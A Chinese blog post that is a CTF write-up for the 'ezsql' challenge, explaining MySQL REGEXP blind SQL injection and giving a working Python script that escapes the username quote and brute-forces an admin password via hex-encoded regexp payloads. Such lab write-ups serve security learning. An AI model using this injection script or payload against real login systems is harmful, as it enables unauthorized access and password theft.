CTF每日练习之“ezsql“-regexp注入

已于 2023-08-29 16:55:07 修改
阅读量408 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
于 2023-08-27 10:23:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lcw991207/article/details/132520421
版权

文章目录

CTF每日练习之"ezsql"

青少年CTF训练平台
传送门:青少年CTF训练平台

在这里插入图片描述

regexp注入

提示:regexp盲注
文章传送:REGEXP注入与LIKE注入学习笔记
REGEXP注入,即regexp正则表达式注入。REGEXP注入,又叫盲注值正则表达式攻击。
应用场景就是盲注,原理是直接查询自己需要的数据,然后通过正则表达式进行匹配。

正则表达式:
用来检查一个字符串是否含有某个子字符串,将匹配的子字符串做替换或者从某个字符串中取出符合某个条件的子串等,前端往往有大量的表单数据校验工作,采用正则表达式会使得数据校验的工作量大大减轻。常用效果:邮箱、手机号、身份证号等

漏洞复现

提示:regexp盲注
在这里插入图片描述

通过尝试发现过滤了select、union、'、"、、=、like、and等
利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写

import requests

import string


def str2hex(string):
    result = ''

    for i in string:
        result += hex(ord(i))

    result = result.replace('0x', '')

    return '0x' + result


strs = string.ascii_letters + string.digits

url = "http://b860d0fe-b343-4945-85e3-8dda6ca2ae83.challenge.qsnctf.com:8081/login.php"

headers = {

    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'

}

payload = 'or password regexp binary {}#'

if __name__ == "__main__":

    name = ''

    for i in range(1, 40):

        for j in strs:

            passwd = str2hex('^' + name + j)

            payloads = payload.format(passwd)

            postdata = {

                'username': 'admin\\',

                'password': payloads

            }

            r = requests.post(url, data=postdata, headers=headers)

            if "Maybe you are right" in r.text:
                name += j

                print(j, end='')

                break

破解密码
拿到flag
在这里插入图片描述

是liku不是里库
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ezsql
2301_79935671的博客
03-21 312
题目靶机地址解释:第一行:目标机器 WEB 服务地址第二行:目标机器 SSH 地址以及端口第三行:Check 服务访问地址。
ezSQL:ezSQL类的用法和详细信息
05-12
EZSQL数据库类 EzSQL是用PHP编程语言编写的类,它构成了高级应用程序(如Wordpress)的基础结构。 此类的基本功能是连接到数据库并管理表中的数据。 用于Mssql,Mysql,Oracle,Sybase,Postgresql,Sqlite数据库。 由Wordpress使用。 为什么选择EZSQL? 它的制片人贾斯汀·文森特(Justin Vincent)回答如下: •在PHP系统中快速轻松地管理数据库。 (mySQL / Oracle8 / 9 / InterBase / FireBird / PostgreSQL / MS-SQL / SQLite / SQLite C ++) •它包含一个添加到脚本中的单个php文件,并允许您快速轻松地使用标准数据库功能。 •为了避免额外的负载,服务器会自动缓存查询并允许您使用它们。 •它提供了非常舒适地调试查询的机会。 •
Ezsql
weixin_46601305的博客
01-15 610
BUUCTF Ezsql
ezsql mysql_认识ezSQL,一个简单方便的php数据库类
weixin_35676977的博客
01-19 233
用 WordPress 几年的时间了,却并不了解 WordPress,作为一只井底之蛙,我不是一个专业的人,毕竟我了解的还不够全面,做网站这么久了,我居然不知道还有ezSQL这么一个好的开源 PHP 数据库类。知道 ezSQL 也有一些日子了,记得还是因为当时做我们泪雪用户中心的时候了解到的,因为当时项目已经接近尾声,所以也就没有用上 ezSQL,实属遗憾,所以最近想做一个小拓展的时候,子凡第一时...
【BUUCTF 加固题】Ezsql 速通
人若无名,便可专心练剑
02-16 1644
【BUUCTF 加固题】Ezsql 速通
EZSQL 中文手册
lyzhang1999的专栏
02-12 3834
ezSQL Overview download ez_sql.zip  To email the creator: justin_at_jvmultimedia_dot_com ezsql 概况 · ezSQL is a widget that makes it very fast and easy for you to use database(s) within your PHP scr
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
CTF-RSA-tool-master.zip
01-19
针对CTF中CRYPTO的RSA工具
青少年CTF-ezsql-题目解析
zxsctf的博客
01-07 627
username处加反斜杠转义单引号,造成逃逸,后面可控,成为注入点,payload:or password regexp binary {}#通过探测发现过滤了select、union、'、"、、=、like、and等。利用regexp进行匹配猜测数据,还需要用binary关键字来区分大小写。进入提示,发现要我们登陆,点击确定后跳转到了login.php目录。题目的考点应该是本题考点为MySQL regexp盲注了。题目来源:克拉玛依市第一届网络安全技能大赛。
ezSQL - 快速、灵活的 SQL 编辑器
最新发布
gitblog_00087的博客
03-18 440
ezSQL - 快速、灵活的 SQL 编辑器 ezSQL 是一个轻量级但功能强大的 SQL 编辑器,旨在帮助开发人员更轻松地编写和管理他们的 SQL 查询。无论您是数据库管理员还是开发者,都可以利用 ezSQL 的各种特性提高您的工作效率。 主要特点 跨平台支持 - 支持 Windows, macOS 和 Linux 操作系统。 简洁易用的界面 - 易于理解的布局和直观的操作方式让您可以快速上手...
BUUCTF 加固题 Ezsql WriteUp
柠檬i的博客
01-15 7917
本题的web界面是登录界面,界面含有sql注入漏洞,题目要求进入目标服务器修复漏洞,然后进行Check,Check True即可返回flag值
XCTF easysql注入writeup
小傅
07-16 649
我没有拿到flag,不过根据writeup的提示。。。还是没做出来。有朋友做出来了可以在下面评论。 官方提示如下 根据提示,我写了一个脚本,脚本代码如下,这个脚本可以在代码里修改用户名和密码,直接完成在网站上用户名和密码的创建和登录以及修改密码。 # -*-coding:utf-8-*- import requests #cookiesq全局变量不用改 url = "http://1...
ezsql mysql_PHP_ezSQL PHP数据库操作类库,ezSQL 下载地址: 下载 : ezSQL 新 - phpStudy
weixin_34827430的博客
02-01 626
ezSQL PHP数据库操作类库ezSQL 下载地址:下载 : ezSQL新版本是2.05添加了很多支持,包括 CodeIgniter,MSSQL, PDO 等等我之前也为 CodeIgniter 写过一次,不过只支持 MySQL看看使用示例其实也没什么难度,直接看源代码即可,主要是程序设计的思想很好。Example 1---------------------------------------...
xctf攻防世界easysql wp
sash1mi
02-20 1843
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 253
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
[GYCTF2020]Ezsqli 绕过or information_schema 无列名注入
m0_64180167的博客
10-09 467
说好的ez....我们开始吧首先就直接进行抓包 看回显然后开始正常的测试报错了 这里的。
ctf工具之binwalk--windows下(misc).rar
07-30
binwalk是一款用于分析和提取嵌入在二进制文件中的文件和数据的工具。对于CTF比赛来说,binwalk可以帮助我们进行文件的分析和提取,从而更好地理解题目并解决问题。 在Windows下使用binwalk,我们首先需要在官方网站(https://github.com/ReFirmLabs/binwalk)下载并安装binwalk的Windows版本。安装完成后,我们可以在命令行中使用binwalk命令进行操作。 拿到CTF题目中的misc.rar文件后,我们可以使用binwalk来分析该文件。在命令行中,我们输入以下命令: binwalk misc.rar binwalk会对该文件进行分析,并将分析结果显示在命令行中。它会检测并提取出文件中的隐藏信息,并尝试识别文件中可能存在的其他类型文件(如图像、压缩包等)。 除了显示分析结果外,binwalk还支持提取文件中的隐藏文件。我们可以使用以下命令来提取隐藏文件: binwalk -e misc.rar 这会将隐藏在misc.rar中的文件提取到当前目录中。我们可以通过查看提取出的文件来获得进一步的线索或解答。 总之,binwalk是一款强大的CTF工具,它可以帮助我们分析和提取嵌入在二进制文件中的文件和数据。在Windows下使用binwalk可以通过命令行进行操作,从而更好地解决CTF比赛中的问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是liku不是里库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值